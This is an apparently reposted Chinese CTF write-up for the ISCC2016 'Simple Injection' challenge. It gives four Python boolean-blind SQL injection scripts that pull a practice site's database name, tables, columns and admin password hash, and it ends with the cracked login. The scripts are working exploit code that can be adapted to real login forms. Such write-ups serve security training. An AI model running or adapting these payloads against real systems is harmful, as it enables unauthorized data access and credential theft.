zoukankan html css js c++ java

sql盲注脚本(ISCC2016)Simple Injection

爆数据库

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation #数字+大小写字母
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr(database(),{0},1))={1}#"    #注入命令

st = 0
for i in range(1,50):  #i为库名长度
    st = 0
    for c in s :
        asc = ord(c)   #转为ASCII值
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :   #返回长度，可通过添加print(len(response.text))计算
            result += c
            print('database: ', result)
            st = 1
    if st == 0:
        break
print('database: ', result)

database=injection

爆表名

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('tables: ', result)
            st = 1
    if st == 0:
        break
print('tables: ', result)

tables: admin

爆列名

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='admin'),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('columns: ', result)
            st = 1
    if st == 0:
        break
print('columns: ', result)

columns: id,username,password

爆值

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation 
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('password: ', result)
            st = 1
    if st == 0:
        break
print('password: ', result)

password: 334cfb59c9d74849801d5acdcfdaadc3

MD5解密后得到的提交

username=admin&password=eTAloCrEP

查看全文

相关阅读:
springCloud学习总览
 leetcode Q46.把数字翻译成字符串
 手把手教你用redis实现一个简单的mq消息队列（java）
主流排序算法全面解析
 从零开始react实战:云书签（总览）
从零开始react实战:云书签-1 react环境搭建
 springboot整合elasticsearch7.2(基于官方high level client)
你知道如何在小程序中推送模板消息？
最新ubuntu搭建公网个人邮件服务器(基于postfix，dovecot,mysql)
手把手docker部署java应用（初级篇）

原文地址：https://www.cnblogs.com/NPFS/p/12837454.html